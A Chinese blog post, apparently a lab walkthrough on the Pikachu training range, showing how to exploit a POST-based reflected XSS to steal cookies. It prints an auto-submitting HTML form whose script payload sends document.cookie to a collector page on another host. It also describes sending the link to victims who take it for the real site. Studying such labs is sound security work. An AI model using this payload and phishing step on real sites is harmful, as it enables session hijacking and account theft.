5.XSS-反射型(post)利用:获取cookie

于 2024-06-23 09:00:00 发布
阅读量265 收藏
点赞数 3
分类专栏: 网络安全web测试之xss与暴漏破解 文章标签: xss 前端 cookie
曲云龙
本文链接:https://blog.csdn.net/weixin_46253249/article/details/139701419
版权

原理:
在这里插入图片描述

文件路径:\pikachu\pkxss\xcookie\post.html
将post.html文件,复制到皮卡丘的根路径下或者根下随意路径即可,并编辑文件
需要修改以下两个地址,第一个地址是将原界面的样子链接过来,让用户认为是原界面,第二个是将cookie从数据库中提取出来的程序(注意和自己的目录相对应)
基于域名配置文件
在这里插入图片描述

基于IP地址配置文件

<html>
<head>
<script>
window.onload = function() {
  document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<form method="post" action="http://192.168.30.168/pikachu/vul/xss/xsspost/xss_reflected_post.php">
    <input id="xssr_in" type="text" name="message" value=
    "<script>
document.location = 'http://192.168.30.168/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;
	</script>"
	 />
    <input id="postsubmit" type="submit" name="submit" value="submit" />
</form>
</body>
</html>

然后将url:www.pikachu.net/post.html发给用户访问,会直接跳转到post型链接上;
用户误以为是正常网站去访问
在这里插入图片描述

在pkxss平台直接获取用户信息

在这里插入图片描述

愿听风成曲
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【网络攻防】“跨站脚本攻击“ 第一弹 ——反射XSS
翼安研习社的博客
01-28 2384
撰稿|谢泳 编辑|王聪丽 信息收集|谢泳** 目录1. 初识XSS2. 反射XSS2.1 Cookie劫持2.2 Get请求2.3 Post请求3. 防御方式 1. 初识XSS 跨站脚本攻击(Cross Site Script, XSS)是利用web前端代码注入来篡改页面,执行恶意脚本,达到窃取数据、冒充身份等目的的攻击方法。 浏览器根据HTML代码解析页面,现在的HTML中可以有很多JavaScript脚本,XSS攻击则是利用前端代码的漏洞,插入恶意代码。 XSS攻击者必须有一定的JavaScri.
Pikachu漏洞靶场系列之XSS
weixin_45868644的博客
09-10 4918
文章目录概述跨站脚本漏洞常见类XSS漏洞的测试流程搭建XSS后台一、反射XSS(Get)实验案例-获取Cookie二、反射XSS(Post)三、存储XSS实验案例-钓鱼攻击实验案例-键盘记录什么是跨域跨域-同源策略为什么要同源策略四、DOMXSS五、DOMXSS-X六、XSS之盲打七、XSS之过滤转换的思路编码的思路XSS之htmlspecialcharsXSS常见防范措施XSS之href输出XSS之js输出总结XSS常见Payload 概述 1、XSS就是攻击者在web页面插入恶意的Scri
4.XSS-反射(get)利用获取cookie
愿听风成曲
06-23 332
我这里将对应的IP地址修改为本地pikachu的主站IP地址,这样给用户造成一种正常视觉上的欺骗,容易上当。修改一下配置文件\pikachu\pkxss\xcookie\cookie.php。就能获取到用户的IP,cookie值,refer二,ua等相关信息。输入基于域名的搭建的pkxss,在搜索框里输入链接。可以将referer的链接发送给对应的要攻击的用户。基于IP搭建的pkxss平台(入侵者的IP地址)在皮卡丘里面的xss后台进入cookie收集。我这里基于域名搭建的pkxss平台。
基于dvwa的反射性xss获取其中的cookie分享篇
weixin_47319512的博客
05-10 1366
好切回正题,这段代码的是正则表达意思就是把这些'/
反射xss偷取cookie(本地验证)
think_ycx的专栏
11-14 3180
原理反射xss 为危害之一就是:用户在登录的情况下点击了黑客发送的链接,就会导致该网址的cookie泄露,导致帐号被黑客登录。
XSS获取COOKIE
04-20
XSS获取COOKIE
反射xss攻击代码.rar
05-14
反射跨站脚本攻击(Reflected Cross-Site Scripting,简称反射XSS)是一种常见的网络安全威胁,攻击者利用此类漏洞可以窃取用户的敏感信息,例如Cookie、Session ID等。Java作为一种广泛使用的后端开发语言,也...
Python-XSSFinder用于检测网站中反射的xss工具集
08-10
**Python XSSFinder:网站反射XSS检测工具集** XSSFinder是一款基于Python开发的工具,专门用于检测网站中存在的反射跨站脚本(Reflected Cross-Site Scripting,简称XSS)漏洞。XSS攻击是一种常见的网络安全...
第26天:WEB漏洞-XSS跨站之订单及Shell箱子反杀记1
08-03
2. **Shell箱子系统XSS盲打**:利用Shell管理工具的输入验证不足,注入XSS,获取服务器控制权。 3. **后台权限维持**:通过XSS保持攻击者的登录状态,即使管理员注销,攻击者仍能控制账户。 ### Session与Cookie...
xss_talk:我的XSS演讲的幻灯片和演示应用程序
05-22
- 身份冒用:利用XSS获取用户会话信息,实现对用户身份的冒用。 - 传播恶意软件:在受害者的浏览器上执行恶意脚本,下载并安装病毒或木马。 3. XSS防护策略: - 输入验证:对用户提交的数据进行严格的过滤和校验...
xsser-main意思意思下
最新发布
06-26
XSS攻击主要分为三类:反射XSS、存储XSS和DOMXSS。 1. 反射XSS:攻击者构造一个包含恶意脚本的URL,诱使用户点击,当URL被用户浏览器解析时,脚本会被执行。这种类的XSS通常是临时的,因为脚本只在用户单...
第七周作业 1.domXSS详解及演示 2.cookie获取及xss后台使用 3.反射XSS(POST) 4.xss钓鱼演示 5.xss获取键盘记录演示
weixin_43899561的博客
04-21 1868
1.domXSS详解及演示 一、什么是DOM?怎么理解DOM? DOM全称是Document Object Model,也就是文档对象模。我们可以将DOM理解为,一个与系统平台和编程语言无关的接口,程序和脚本可以通过这个接口动态地访问和修改文档内容、结构和样式。当创建好一个页面并加载到浏览器时,DOM就悄然而生,它会把网页文档转换为一个文档对象,主要功能是处理网页内容。故可以使用 Javasc...
xss收集cookie方法(以pikachu靶场举例)
weixin_59047731的博客
01-13 808
本文提到的收集cookie的后台页面来自于pikachu靶场,只是把它单独提出来弄成一个网站(完整安装皮卡丘的安装包中都有这个pkxss文件的)
皮卡丘(pikachu) XSS三种类举例
weixin_44787832的博客
07-22 3470
反射xss(get) 首先输入 >'''<> 并提交,发现可以正常输出 查看源码 发现我们的输入全部输出到了p标签中 之后我们输入payload: <script>alert("xss")</script> 发现输入框中容不下这么长的数据 之后我们F12,去改maxlength的值 改完后我们的payload执行成功 查看源码,JS代码被浏览器执行 像这种GET的XSS漏洞,一般可将含XSS的URL伪.
Pikachu靶场通关笔记--Cross-Site Scripting (XSS)
weixin_45908624的博客
12-02 1197
pikachu XSS
最简单的反射XSS拿cookie
热门推荐
thislocal的博客
03-29 1万+
参考了网上的一堆教程和余弦的《web前端黑客技术揭秘》 主要是关于XSS的。更准确一点,关于盗取cookie的,且是反射。其实就是最简单的一个反射cookie盗取过程。 一、XSS的一般过程: 1、找到XSS漏洞,假设存在于网站A; 2、发送可以触发该漏洞的,特定代码到攻击目标; 可以这样构造:凤姐最新性感视频 其中,www.foo.com/xss/xss.php?x=是存在漏洞的
XSS的键盘记录和cookie获取
Williamanddog的博客
01-26 1648
跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混 淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意JavaScript代码,当用户浏览该页 面时,嵌入Web里面的JS代码会被执行,从而达到恶意攻击用户的目的。XSS攻击针对的是用户层面的 攻击。 在一个Web页面上,有一种很常见的功能是将用户输入的内容输出到页面上。但是如果这里输入的内容 。
反射xss钓鱼盗取用户cookie
m0_53820621的博客
01-16 4437
演示用靶场:dvwa
xss反射post_反射XSS的另类利用思路
weixin_40006977的博客
01-14 913
一、前言好久没有更新公众号了,最近一直在忙,差点都忘记有公众号这回事了。以后,,以后不能这样了,坚持更新,望各位表哥监督。二、简介好了,进入正文,以前的时候遇到的反射的xss,利用思路的思路就不是很多,get的还好一些,post如果不能改成get,就更难利用了,更别说xss在header里的了。前两天正好想到一个比较不错的思路,刚好给各位表哥分享,也许以后能用的到。就...
Java的堆外内存,可以用以下哪个参数设置最大值 A. -XX:MaxDirectMemorySize B. -Xmx C. -XX:MaxPermSize D. –Xss
06-01
选项 A. -XX:MaxDirectMemorySize 可以用于...选项 -Xmx 是用于设置 Java 堆的最大大小,选项 -XX:MaxPermSize 是用于设置永久代的最大大小,选项 -Xss 是用于设置每个线程的堆栈大小。它们都与堆外内存的设置无关。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

愿听风成曲

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值